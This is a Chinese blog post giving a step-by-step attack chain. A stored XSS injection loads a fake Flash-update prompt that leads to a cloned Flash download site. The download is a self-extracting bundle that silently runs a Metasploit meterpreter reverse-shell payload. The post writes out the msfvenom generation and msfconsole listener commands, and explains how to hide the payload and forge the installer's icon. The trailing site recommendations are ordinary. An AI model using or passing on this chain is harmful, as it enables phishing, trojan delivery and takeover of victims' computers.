xss漏洞->flash钓鱼网站->拿到主机控制权

于 2024-07-23 20:49:03 发布
阅读量244 收藏 5
点赞数 7
文章标签: xss 单片机 stm32
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68186313/article/details/140645802
版权

步骤⼀:在本机phpstudy中开启相关服务

步骤⼆:下载以下项⽬并将其源码⽂件部署在⽹站根⽬录下...稍作修改并访问

# 项⽬地址
https://github.com/r00tSe7en/Fake-flash.cn #旧版
https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash #新版

源码部署

在存储型xss的窗口中输入 <script src="file:///E:/phpstudy_pro/WWW/1.js"></script>

访问

步骤三:修改内容-index.html

步骤四:来到xss平台 点击公共模块---flash弹窗钓⻥-查看 将其中的代码保存成⼀个js⽂件放到我们⽹ 站的根⽬录下⾯

步骤五:修改js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址

步骤六:进⼀步对提供下载的Flash⽂件进⾏伪装...在真的Flash官⽹下载安装程序并使⽤MSF⽣成⼀个木马

# Flash官⽹下载
https://www.flash.cn/download-wins
# MSF⽣成Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe
# 开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 虚拟机的IP
set lport 4444
run

下载安装程序

msf生成木马

开始监听

步骤七:将两个⽂件⼀块压缩并更改⽂件名为"flashcenter_pp_ax_install_cn.exe",点击"⾼级"标签⻚下的"⾃解压选项"填 写解压路径为 C:\Windows\Temp

步骤八:点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...

C:\Windows\Temp\shell.exe
C:\Windows\Temp\flashcenter_pp_ax_install_cn.exe

步骤九:配置更新⽅式--->解压并更新⽂件⽽覆盖⽅式--->覆盖所有⽂件!!

步骤十:使⽤ ResourceHacker 修改图标,下载安装;通过ResourceHacker打开原版的flash安 装程序,点击 Icon Group ⽂件夹中的⽂件,⿏标右键"保存*.ico资源",即可导出ico图标...

# 下载地址
https://www.onlinedown.net/soft/12420.htm

步骤⼗一:同样的⽅法----ResourceHacker打开刚刚打包好的⽂件,点击Icon Group⽂件夹中的⽂ 件,⿏标右键替换ico图标,最后保存..

步骤⼗二:等待其运行安装,最终获取到受害者网站控制权

screenshare(截获动态屏幕信息)

浅秋沐玖
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 639
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
xss flash钓鱼拿到主机控制权
最新发布
qq_70836100的博客
07-23 112
4.生成钓鱼网站,以flash为例。下载下面的项目并将其源码文件部署在网站根目录。因为木马文件之前选择的是隐藏并且第一个,所以我们的木马会在这个安装界面之前。8.当他点击就会跳转到我的flash,这时候他点击立即下载就会上当。6.去找一个xss漏洞提交1.js,这样管理员登录就会出问题。6.将shell.exe和falsh安装包压缩成一个。7.模拟登录管理员账户后会有以下页面。10.去kali:sysinfo。9.当他运行该文件就会出错。
渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
freeking101的博客
06-12 3713
渗透测试 --- http协议、XSS、CSRF、文件上传、文件包含、反序列化漏洞
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5393
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
模糊测试--强制性安全漏洞发掘
热门推荐
zxygww的专栏
03-12 2万+
http://blog.csdn.net/lxt889/article/details/18546373 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序,包括Microsoft的Intern
NISP一级练习题1-10
weixin_43263566的博客
08-16 7465
A. 在一定程度上,人类社会的发展速度取决于人们感知信息、利用信息的广度和深度B. 信息无时不在,无处不在,信息是我们行动决策的重要依据C. 电视机、电话机、声波、光波是信息D. 人类可以借助信息资源对自然界中的物质资源和能量资源进行有效地获取和利用解析:电视机、电话机、声波、光波不属于信息A. 维持与改进B.维持与报告C.报告与监督D.监督与报告。
渗透测试-安全岗位面试题总结(含答案)
lza20001103的博客
08-18 5275
渗透测试-安全岗位面试题总结(含答案) 1.上传漏洞 原理· 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件, 并通过此脚本文件获得了执行服务端命令的能力。 危害 1、代码执行 上传文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,导致代码执行; 2、域控 上传文件是flash的策略文件crossdomiain.xml,黑客用以控制flash在该域下的行为; 3、网站挂马 上传文件是病毒、木马,黑客用以诱骗用户或者管理员下
Kali Linux-BeEF浏览器渗透框架
道阻且长,行则将至。
12-26 4658
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助 Kali Linux 系统内置的 BeEF 渗透框架,通过一段编制好的JS代码控制目标主机 Win 7 虚拟机的浏览器,进而进行社会工程学攻击(发送钓鱼网页盗窃账户密码、恶意程序发送等)和其他攻击,同时演示借助 Win 7上搭建的DVWA靶场的存储型XSS漏洞自动触发JS攻击脚本(获取Cookie)。 环境说明 ...
xss-labs-master.rar
05-09
XSS攻击的本质是利用网站的输入验证不严,将恶意代码嵌入到网页中,当其他用户访问该页面时,恶意脚本会在他们的浏览器中执行。根据脚本的执行环境,XSS被分为三种类型:反射型XSS、存储型XSS和DOM型XSS。 1. 反射...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
一旦脚本执行,攻击者可以获取用户的会话cookie、执行JavaScript代码、重定向用户到其他网站等。 **游戏/靶场结构** `xss-labs-master`很可能包含一系列逐步增加难度的关卡,每个关卡可能模拟真实世界中的XSS漏洞...
anti-xss:AntiAntiXSS | 通过PHP防止跨站点脚本(XSS
05-02
:Japanese_secret_button: 反XSS “跨站点脚本(XSS)是一种通常... 阅读此文本-> XSS(跨站点脚本)预防备忘单测试此工具-> Zed攻击代理(ZAP) 通过“ composer require”安装composer require voku/anti-xss 用法:
记一次因敏感信息泄露而导致的越权+存储型XSS
2301_80127209的博客
07-23 307
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。
CSRF+XSS组合攻击实战
记录学习
07-19 1335
xss和csrf组合攻击漏洞复现
DVWA靶场超(详细教程)--跨站攻击(XSS+CSRF)
weixin_60838266的博客
07-19 1126
webanquan”去掉了(替换为空),我们的输入从alert变成了alert()
Linux网络命令
Xpccccc的博客
07-19 489
Linux网络命令
DOM-XSS漏洞挖掘与攻击面全面解析
常见的DOM-XSS漏洞位置包括: 1. URL代入页面: 在页面加载时,某些用户输入字段可能导致URL被恶意注入,如搜索框、表单提交等。攻击者通过构造恶意URL,利用location.href属性获取location.search和location.hash中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值